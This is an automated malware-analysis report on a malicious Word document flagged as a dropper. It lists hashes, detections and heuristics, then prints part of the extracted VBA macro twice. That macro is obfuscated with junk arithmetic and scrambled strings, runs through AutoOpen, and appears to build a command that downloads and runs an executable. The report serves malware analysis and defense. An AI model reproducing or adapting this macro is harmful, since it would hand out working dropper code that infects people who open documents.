Office (OLE) malware analysis — malicious · b26fa7e3f85d5bd8

MALICIOUS

Office (OLE)

126.5 KB Created: 2018-05-03 07:14:00 Authoring application: Microsoft Office Word First seen: 2019-10-01

MD5: 0780ca66fced4250ab5ac23e976e970a SHA-1: 4f56abfb593661d757b094fb44d9600a37d4554c SHA-256: b26fa7e3f85d5bd8ccca12d893dea59e60bca6bbdf035a2cc516c5da51d00d9a

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The Autoopen macro is also present, which is a common entry point for malicious execution in Office documents. The ClamAV detection name 'Doc.Dropper.Agent-6528739-0' further suggests its function as a dropper. The VBA script is heavily obfuscated, but the presence of these indicators strongly suggests it is designed to download and execute a secondary payload.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6528739-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6528739-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 115258 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	115258 bytes
SHA-256: `50362d8e818c2962921d65ec915df21b9524a79b9fa5b4d473c5808cd98f9456`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ujDjvvQ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub jpiWVs(tssPw) twzSX = 89948 * CByte(bcDtOn) wvGHf = Int(92496) - Oct(30921 - 82308 * TYNLPB) YCFNn = 98570 * CByte(NSkFX) End Sub Sub moIif(zlkkA) CSduJj = 40580 * CByte(airIZY) Wtpurs = Int(69110) - Oct(85177 - 59458 * ffuDQ) RFXlhv = 35999 * CByte(AjzjH) zIHYas = 90646 * CByte(JzSZwi) EaWKqZ = Int(7137) - Oct(4275 - 75677 * bajuH) DkhQWX = 42676 * CByte(YtcvaS) woivJ = 50997 * CByte(RYvGU) zROvC = Int(4280) - Oct(29548 - 79080 * OIhEt) wzHcVI = 58631 * CByte(CwzUjT) End Sub Sub UQDNd(ijtXC) faWOE = 63179 * CByte(Uboizz) iMzEh = Int(66465) - Oct(42244 - 15837 * rdqQfR) NESqw = 24166 * CByte(jtnwwi) mEOIcS = 68588 * CByte(qUwXji) NQFDKa = Int(49868) - Oct(63584 - 18316 * RfNKt) XaMFZc = 14049 * CByte(zjXNz) End Sub Sub Autoopen() On Error Resume Next bfBwfX = 82635 * CByte(XGMXEm) mVfwi = Int(47288) - Oct(94569 - 38523 * LlJCD) CMjPum = 57434 * CByte(iWvcC) TiOoQjQV (tCXUs + nFODYizhYv + KsQPV) LdmuNo = 83371 * CByte(DznpsX) GAamw = Int(89143) - Oct(25867 - 59843 * NoJrT) vTuQa = 1176 * CByte(kIGlJC) End Sub Sub OicUDE(qcZjww) hYfzau = 8937 * CByte(vbzIi) SjLlK = Int(72224) - Oct(89795 - 58644 * ooORF) UjcCzD = 69137 * CByte(liIoun) XuacY = 93628 * CByte(wnMiC) rKLdz = Int(56051) - Oct(50226 - 91202 * GiMiF) CCwAq = 22727 * CByte(uoohu) hopQA = 45545 * CByte(aWfpRN) CovPq = Int(83574) - Oct(77562 - 92899 * PiMAaQ) oSiTN = 62233 * CByte(OMKVz) End Sub Sub WHidGO(tYrCS) DZhoXI = 18955 * CByte(qXiur) YjDfV = Int(79269) - Oct(32261 - 27959 * zitML) QbjAcc = 81113 * CByte(YnMpfj) End Sub Attribute VB_Name = "AiPrhNVLjdUo" Sub hFdww(awCtO) izfsJz = 71683 * CByte(YzAiUi) vPzXH = Int(77256) - Oct(48197 - 98472 * JQqIF) wpAwwN = 80667 * CByte(XdjGs) End Sub Function nFODYizhYv() On Error Resume Next HaPTn = 36440 * CByte(cGdhi) AqKKP = Int(78184) - Oct(38288 - 29334 * FjYvSt) GJKXZG = 1995 * CByte(GZUcj) ZPmwhk = OUtvU("2Zt m0'+'IFd'+'aOIm0l'+'nWIm0'+'oD6Hs.UYYImZ{yr'+'t{)XC'+'DA'+'ImZ ni'+' '+'cfs0P", 15852 - 15852 + 3 + 15852 - 15852, 15852 - 15852 + 75 + 15852 - 15852) WhfhX = 81953 * CByte(miBYG) VjusA = Int(35142) - Oct(83564 - 99893 * XKzup) DqUrjQ = 67542 * CByte(tOvDNU) FRslq = 61262 * CByte(zlJEtb) mMAtAl = Int(87272) - Oct(69941 - 63332 * ujFml) GUuQYB = 19228 * CByte(vJwSHU) wzhDTIr = OUtvU("hCuaIm'+'Z('+'hcaef1X", 58571 - 58571 + 4 + 58571 - 58571, 58571 - 58571 + 15 + 58571 - 58571) KjEbiO = 91561 * CByte(JPVkc) KatNLC = Int(70207) - Oct(98517 - 19907 * lCIwqp) cMZjwB = 21446 * CByte(LLIkB) GVJwk = 27979 * CByte(RMchkp) Nmtip = Int(96059) - Oct(90130 - 24097 * rOovTc) VsaGQA = 26772 * CByte(dYjvw) jtvVYiCw = OUtvU("HUfis'+'a'+'d'+'as6m.Qb", 6267 - 6267 + 6 + 6267 - 6267, 6267 - 6267 + 14 + 6267 - 6267) wIiKG = 13466 * CByte(vnzWu) SkvSNp = Int(52822) - Oct(14566 - 78553 * jjNYm) QOwOL = 90898 * CByte(GlNVi) fpdjYh = 44771 * CByte(faDAsl) jEZYn = Int(40218) - Oct(8761 - 25728 * PpHzji) BXwiA = 92355 * CByte(SMAqHD) pEplszjZYw = OUtvU("2@1Vr'+'of;)63ge6'+'3g+'+'63gxe.'+'6'+'3'+'g( '+'+ BSNI'+'mZ '+'+ 63gfcD6'+'3g + c'+'i'+'lb'+'up:vn'+'eImZ ='+vKnq", 49606 - 49606 + 5 + 49606 - 49606, 49606 - 49606 + 106 + 49606 - 49606) XYOpG = 1413 * CByte(DXYab) TjZZz = Int(94541) - Oct(12389 - 2273 * vDWkOH) niwKF = 83794 * CByte(tIZhv) GrELj = 55188 * CByte(bWThzL) ... (truncated)

SHA-256: 50362d8e818c2962921d65ec915df21b9524a79b9fa5b4d473c5808cd98f9456

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ujDjvvQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub jpiWVs(tssPw)
twzSX = 89948 * CByte(bcDtOn)
            wvGHf = Int(92496) - Oct(30921 - 82308 * TYNLPB)
            YCFNn = 98570 * CByte(NSkFX)
End Sub
Sub moIif(zlkkA)
CSduJj = 40580 * CByte(airIZY)
            Wtpurs = Int(69110) - Oct(85177 - 59458 * ffuDQ)
            RFXlhv = 35999 * CByte(AjzjH)
zIHYas = 90646 * CByte(JzSZwi)
            EaWKqZ = Int(7137) - Oct(4275 - 75677 * bajuH)
            DkhQWX = 42676 * CByte(YtcvaS)
woivJ = 50997 * CByte(RYvGU)
            zROvC = Int(4280) - Oct(29548 - 79080 * OIhEt)
            wzHcVI = 58631 * CByte(CwzUjT)
End Sub
Sub UQDNd(ijtXC)
faWOE = 63179 * CByte(Uboizz)
            iMzEh = Int(66465) - Oct(42244 - 15837 * rdqQfR)
            NESqw = 24166 * CByte(jtnwwi)
mEOIcS = 68588 * CByte(qUwXji)
            NQFDKa = Int(49868) - Oct(63584 - 18316 * RfNKt)
            XaMFZc = 14049 * CByte(zjXNz)
End Sub
Sub Autoopen()
On Error Resume Next
bfBwfX = 82635 * CByte(XGMXEm)
            mVfwi = Int(47288) - Oct(94569 - 38523 * LlJCD)
            CMjPum = 57434 * CByte(iWvcC)
TiOoQjQV (tCXUs + nFODYizhYv + KsQPV)
LdmuNo = 83371 * CByte(DznpsX)
            GAamw = Int(89143) - Oct(25867 - 59843 * NoJrT)
            vTuQa = 1176 * CByte(kIGlJC)
End Sub
Sub OicUDE(qcZjww)
hYfzau = 8937 * CByte(vbzIi)
            SjLlK = Int(72224) - Oct(89795 - 58644 * ooORF)
            UjcCzD = 69137 * CByte(liIoun)
XuacY = 93628 * CByte(wnMiC)
            rKLdz = Int(56051) - Oct(50226 - 91202 * GiMiF)
            CCwAq = 22727 * CByte(uoohu)
hopQA = 45545 * CByte(aWfpRN)
            CovPq = Int(83574) - Oct(77562 - 92899 * PiMAaQ)
            oSiTN = 62233 * CByte(OMKVz)
End Sub
Sub WHidGO(tYrCS)
DZhoXI = 18955 * CByte(qXiur)
            YjDfV = Int(79269) - Oct(32261 - 27959 * zitML)
            QbjAcc = 81113 * CByte(YnMpfj)
End Sub

Attribute VB_Name = "AiPrhNVLjdUo"
Sub hFdww(awCtO)
izfsJz = 71683 * CByte(YzAiUi)
            vPzXH = Int(77256) - Oct(48197 - 98472 * JQqIF)
            wpAwwN = 80667 * CByte(XdjGs)
End Sub
Function nFODYizhYv()
On Error Resume Next
HaPTn = 36440 * CByte(cGdhi)
            AqKKP = Int(78184) - Oct(38288 - 29334 * FjYvSt)
            GJKXZG = 1995 * CByte(GZUcj)
ZPmwhk = OUtvU("2Zt m0'+'IFd'+'aOIm0l'+'nWIm0'+'oD6Hs.UYYImZ{yr'+'t{)XC'+'DA'+'ImZ ni'+' '+'cfs0P", 15852 - 15852 + 3 + 15852 - 15852, 15852 - 15852 + 75 + 15852 - 15852)
WhfhX = 81953 * CByte(miBYG)
            VjusA = Int(35142) - Oct(83564 - 99893 * XKzup)
            DqUrjQ = 67542 * CByte(tOvDNU)
FRslq = 61262 * CByte(zlJEtb)
            mMAtAl = Int(87272) - Oct(69941 - 63332 * ujFml)
            GUuQYB = 19228 * CByte(vJwSHU)
wzhDTIr = OUtvU("hCuaIm'+'Z('+'hcaef1X", 58571 - 58571 + 4 + 58571 - 58571, 58571 - 58571 + 15 + 58571 - 58571)
KjEbiO = 91561 * CByte(JPVkc)
            KatNLC = Int(70207) - Oct(98517 - 19907 * lCIwqp)
            cMZjwB = 21446 * CByte(LLIkB)
GVJwk = 27979 * CByte(RMchkp)
            Nmtip = Int(96059) - Oct(90130 - 24097 * rOovTc)
            VsaGQA = 26772 * CByte(dYjvw)
jtvVYiCw = OUtvU("HUfis'+'a'+'d'+'as6m.Qb", 6267 - 6267 + 6 + 6267 - 6267, 6267 - 6267 + 14 + 6267 - 6267)
wIiKG = 13466 * CByte(vnzWu)
            SkvSNp = Int(52822) - Oct(14566 - 78553 * jjNYm)
            QOwOL = 90898 * CByte(GlNVi)
fpdjYh = 44771 * CByte(faDAsl)
            jEZYn = Int(40218) - Oct(8761 - 25728 * PpHzji)
            BXwiA = 92355 * CByte(SMAqHD)
pEplszjZYw = OUtvU("2@1Vr'+'of;)63ge6'+'3g+'+'63gxe.'+'6'+'3'+'g( '+'+ BSNI'+'mZ '+'+ 63gfcD6'+'3g + c'+'i'+'lb'+'up:vn'+'eImZ ='+vKnq", 49606 - 49606 + 5 + 49606 - 49606, 49606 - 49606 + 106 + 49606 - 49606)
XYOpG = 1413 * CByte(DXYab)
            TjZZz = Int(94541) - Oct(12389 - 2273 * vDWkOH)
            niwKF = 83794 * CByte(tIZhv)
GrELj = 55188 * CByte(bWThzL)
      
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.